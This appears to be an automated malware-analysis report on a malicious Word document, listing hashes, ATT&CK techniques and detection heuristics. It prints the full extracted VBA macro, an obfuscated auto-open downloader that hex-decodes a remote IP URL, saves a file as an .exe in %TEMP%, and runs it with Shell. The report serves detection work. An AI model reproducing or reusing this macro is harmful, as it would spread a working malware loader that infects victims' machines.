Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 647d4115b9a7a770…

MALICIOUS

Office (OLE)

Size: 41.5 KB
Created: 2014-11-24 10:11:00
Authoring application: Microsoft Office Word
First seen: 2015-02-05
MD5: 9875233ba6f2c6d10fbf3c91f0b46a96
SHA-1: c8683031e76cfbb4aba2aea27b8a77833642ea7d
SHA-256: 647d4115b9a7a77076ec268a480cf898d18433929664200e1b336ecfdc357fcd
Risk score: 406

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter

The sample contains obfuscated VBA macros that leverage the URLDownloadToFile API, which indicates the macro's intent is to download and execute a second-stage payload from a remote location. The presence of AutoOpen and Workbook_Open macros, along with critical heuristic firings for obfuscated loaders and execution tokens, strongly suggests downloader functionality.

Heuristics (12)

  • ClamAV: Doc.Downloader.Macr-2 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macr-2
  • Reference to URLDownloadToFile API [critical] SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected [medium, 7 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
        dsfdsf = Shell(jghdfdfdfw, 1)
  • URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script:
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script:
        dsfdsf = Shell(jghdfdfdfw, 1)
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
        Sub AutoOpen()
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script:
        Sub Workbook_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script:
        jghdfdfdfw = Environ(HexToString("54454D50")) & HexToString("5C657267667265672E657865")
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7802 bytes
SHA-256: 688fbb1d91dd660c5e3cdb480e8e976219759e7ec4cfbaf88ca619d9fdeb3df9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
79 of 128 identifiers look randomly generated (e.g. 'jghdfdfdfw') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal sdfdsf As LongPtr, _
    ByVal dfsdfew As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As LongPtr) As LongPtr
#Else
    Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal sdfdsf As Long, _
    ByVal dfsdfew As String, _
    ByVal szFileName As String, _
    ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long
#End If


Sub uiwefds()
Dim PxxgBiNP As Integer
For PxxgBiNP = 0 To 3
Dim NIlZJTAZ As Integer
For NIlZJTAZ = 0 To 2
Dim SkHXFUCU As Integer
For SkHXFUCU = 0 To 9
DoEvents
Next SkHXFUCU
DoEvents
Next NIlZJTAZ
Dim kPqjFzTg As Integer
For kPqjFzTg = 0 To 5
DoEvents
Next kPqjFzTg
DoEvents
Next PxxgBiNP
Dim kYYYffQc As Integer
For kYYYffQc = 0 To 5
Dim ZwNyFHMZ As Integer
For ZwNyFHMZ = 0 To 1
DoEvents
Next ZwNyFHMZ
DoEvents
Next kYYYffQc
Dim iFwnFpAo As Integer
For iFwnFpAo = 0 To 6
DoEvents
Next iFwnFpAo
UGivgHgfdg
End Sub
Sub AutoOpen()
Dim bFcsplDg As Integer
For bFcsplDg = 0 To 7
Dim ShzVbLyO As Integer
For ShzVbLyO = 0 To 5
Dim oQYYiVIE As Integer
For oQYYiVIE = 0 To 9
DoEvents
Next oQYYiVIE
DoEvents
Next ShzVbLyO
Dim zbpkQrDX As Integer
For zbpkQrDX = 0 To 8
DoEvents
Next zbpkQrDX
DoEvents
Next bFcsplDg
Dim kIxlbfDj As Integer
For kIxlbfDj = 0 To 2
Dim dpNiQKzp As Integer
For dpNiQKzp = 0 To 1
DoEvents
Next dpNiQKzp
DoEvents
Next kIxlbfDj
Dim uVEKhVuZ As Integer
For uVEKhVuZ = 0 To 9
DoEvents
Next uVEKhVuZ
    uiwefds
End Sub
Sub Workbook_Open()
Dim ftvowRbL As Integer
For ftvowRbL = 0 To 1
Dim fipkKjzB As Integer
For fipkKjzB = 0 To 4
Dim XyjJYqDQ As Integer
For XyjJYqDQ = 0 To 2
DoEvents
Next XyjJYqDQ
DoEvents
Next fipkKjzB
Dim ZvQsURmk As Integer
For ZvQsURmk = 0 To 7
DoEvents
Next ZvQsURmk
DoEvents
Next ftvowRbL
Dim YaKQIzva As Integer
For YaKQIzva = 0 To 8
Dim zbuUTilv As Integer
For zbuUTilv = 0 To 5
DoEvents
Next zbuUTilv
DoEvents
Next YaKQIzva
Dim WfPlofvJ As Integer
For WfPlofvJ = 0 To 4
DoEvents
Next WfPlofvJ
    uiwefds
End Sub
Sub UGivgHgfdg()

Dim sjACsOEZ As Integer
For sjACsOEZ = 0 To 1
Dim PbqsdXKI As Integer
For PbqsdXKI = 0 To 2
Dim OYRHxAZy As Integer
For OYRHxAZy = 0 To 8
DoEvents
Next OYRHxAZy
DoEvents
Next PbqsdXKI
Dim ZliAaUUv As Integer
For ZliAaUUv = 0 To 7
DoEvents
Next ZliAaUUv
DoEvents
Next sjACsOEZ
Dim hJYYdjbg As Integer
For hJYYdjbg = 0 To 7
Dim jHPjjUXQ As Integer
For jHPjjUXQ = 0 To 7
DoEvents
Next jHPjjUXQ
DoEvents
Next hJYYdjbg
Dim pRfzMFar As Integer
For pRfzMFar = 0 To 6
DoEvents
Next pRfzMFar
dgjkhsd = HexToString("6874")
hdsfhjk = HexToString("74703A2F2F")
dhjkfsd = HexToString("3138382E3133322E3138332E3137393A383038302F6D6F7073692F706F7073692E706870")
    ewrwedsf = dgjkhsd + hdsfhjk + dhjkfsd
Dim mgubxnIb As Integer
For mgubxnIb = 0 To 8
Dim YMlEFDdK As Integer
For YMlEFDdK = 0 To 2
Dim XqVdlrWe As Integer
For XqVdlrWe = 0 To 5
DoEvents
Next XqVdlrWe
DoEvents
Next YMlEFDdK
Dim GVZVCpNw As Integer
For GVZVCpNw = 0 To 6
DoEvents
Next GVZVCpNw
DoEvents
Next mgubxnIb
Dim ddFVFiMb As Integer
For ddFVFiMb = 0 To 8
Dim HGgNeqLB As Integer
For HGgNeqLB = 0 To 6
DoEvents
Next HGgNeqLB
DoEvents
Next ddFVFiMb
Dim VVaaqewe As Integer
For VVaaqewe = 0 To 7
DoEvents
Next VVaaqewe
    jghdfdfdfw = Environ(HexToString("54454D50")) & HexToString("5C657267667265672E657865")
Dim JIXksrqo As Integer
For JIXksrqo = 0 To 6
Dim ZmuZuJAA As Integer
For ZmuZuJAA = 0 To 7
Dim wpZWyUKh As Integer
For wpZWyUKh = 0 To 8
DoEvents
Next wpZWyUKh
DoEvents
Next ZmuZuJAA
Dim RsHNlmzh As Integer
For RsHNlmzh = 0 To 7
DoEvents
Next RsHNlmzh
DoEvents
Next JIXksrqo
Dim wiPdQCYM As Integer
For wiPdQCYM = 0 To 6
Dim MvQkzilR As Integer
For MvQkzilR = 0 To 1
DoEvents
Next MvQkzilR
DoEvents
Next wiPdQCYM
Dim aUclpNWO As Integer
For aUclpNWO = 0 To 2
DoEvents
Next aUclpNWO
    wqewr = URLDownloadToFile(0&, ewrwedsf, jghdfdfdfw, 0&, 0&)
   Dim dsfdsf
Dim xajSsvKH As Integer
For xajSsvKH = 0 To 3
Dim XotIOnTN As Integer
For XotIOnTN = 0 To 4
Dim QcgeTjsF As Integer
For QcgeTjsF = 0 To 2
DoEvents
Next QcgeTjsF
DoEvents
Next XotIOnTN
Dim LAclisaB As Integer
For LAclisaB = 0 To 3
DoEvents
Next LAclisaB
DoEvents
Next xajSsvKH
Dim GCOldYPl As Integer
For GCOldYPl = 0 To 3
Dim xpAyowIw As Integer
For xpAyowIw = 0 To 6
DoEvents
Next xpAyowIw
DoEvents
Next GCOldYPl
Dim toTFvQyC As Integer
For toTFvQyC = 0 To 3
DoEvents
Next toTFvQyC
    dsfdsf = Shell(jghdfdfdfw, 1)

End Sub


Public Function HexToString(ByVal dsfGHJsdf As String) As String
Dim cRFBGXaI As Integer
For cRFBGXaI = 0 To 3
Dim lqCjoUhY As Integer
For lqCjoUhY = 0 To 5
Dim fJrXjdhr As Integer
For fJrXjdhr = 0 To 7
DoEvents
Next fJrXjdhr
DoEvents
Next lqCjoUhY
Dim ibrXgwUZ As Integer
For ibrXgwUZ = 0 To 6
DoEvents
Next ibrXgwUZ
DoEvents
Next cRFBGXaI
Dim xDNrzEzH As Integer
For xDNrzEzH = 0 To 8
Dim JmAtuSal As Integer
For JmAtuSal = 0 To 1
DoEvents
Next JmAtuSal
DoEvents
Next xDNrzEzH
Dim BEgugREc As Integer
For BEgugREc = 0 To 2
DoEvents
Next BEgugREc
    
For y = 1 To Len(dsfGHJsdf)
Dim AuJDUKFJ As Integer
For AuJDUKFJ = 0 To 4
Dim UvHMzkjr As Integer
For UvHMzkjr = 0 To 1
Dim fHuPigTW As Integer
For fHuPigTW = 0 To 5
DoEvents
Next fHuPigTW
DoEvents
Next UvHMzkjr
Dim uRPwSwPf As Integer
For uRPwSwPf = 0 To 6
DoEvents
Next uRPwSwPf
DoEvents
Next AuJDUKFJ
Dim ezQsDXjM As Integer
For ezQsDXjM = 0 To 3
Dim WadqawBn As Integer
For WadqawBn = 0 To 4
DoEvents
Next WadqawBn
DoEvents
Next ezQsDXjM
Dim dVvhcepx As Integer
For dVvhcepx = 0 To 4
DoEvents
Next dVvhcepx
    num = Mid(dsfGHJsdf, y, 2)
Dim PyxhKOLG As Integer
For PyxhKOLG = 0 To 2
Dim hZmZJOoa As Integer
For hZmZJOoa = 0 To 2
Dim ivsfJuvt As Integer
For ivsfJuvt = 0 To 9
DoEvents
Next ivsfJuvt
DoEvents
Next hZmZJOoa
Dim FQeVqElL As Integer
For FQeVqElL = 0 To 6
DoEvents
Next FQeVqElL
DoEvents
Next PyxhKOLG
Dim psmZGKbn As Integer
For psmZGKbn = 0 To 1
Dim AdqmlHZR As Integer
For AdqmlHZR = 0 To 4
DoEvents
Next AdqmlHZR
DoEvents
Next psmZGKbn
Dim maFtCXUC As Integer
For maFtCXUC = 0 To 2
DoEvents
Next maFtCXUC
    uGHdsf = uGHdsf & Chr(CDbl("&h" & num))
Dim ibsiUdwv As Integer
For ibsiUdwv = 0 To 7
Dim sVEHRGPJ As Integer
For sVEHRGPJ = 0 To 4
Dim uUvhwdnW As Integer
For uUvhwdnW = 0 To 3
DoEvents
Next uUvhwdnW
DoEvents
Next sVEHRGPJ
Dim NmeaNlTf As Integer
For NmeaNlTf = 0 To 2
DoEvents
Next NmeaNlTf
DoEvents
Next ibsiUdwv
Dim yQiniWGp As Integer
For yQiniWGp = 0 To 6
Dim sagylpuI As Integer
For sagylpuI = 0 To 4
DoEvents
Next sagylpuI
DoEvents
Next yQiniWGp
Dim yFKJVhsa As Integer
For yFKJVhsa = 0 To 6
DoEvents
Next yFKJVhsa
    y = y + 1
Next y

Dim pswwxpTG As Integer
For pswwxpTG = 0 To 4
Dim bwEKlAom As Integer
For bwEKlAom = 0 To 1
Dim dBxcXWVq As Integer
For dBxcXWVq = 0 To 8
DoEvents
Next dBxcXWVq
DoEvents
Next bwEKlAom
Dim TJtJSTmd As Integer
For TJtJSTmd = 0 To 4
DoEvents
Next TJtJSTmd
DoEvents
Next pswwxpTG
Dim yImZDVeo As Integer
For yImZDVeo = 0 To 7
Dim LoRMzhbw As Integer
For LoRMzhbw = 0 To 7
DoEvents
Next LoRMzhbw
DoEvents
Next yImZDVeo
Dim bxwRxDlo As Integer
For bxwRxDlo = 0 To 3
DoEvents
Next bxwRxDlo
HexToString = uGHdsf
End Function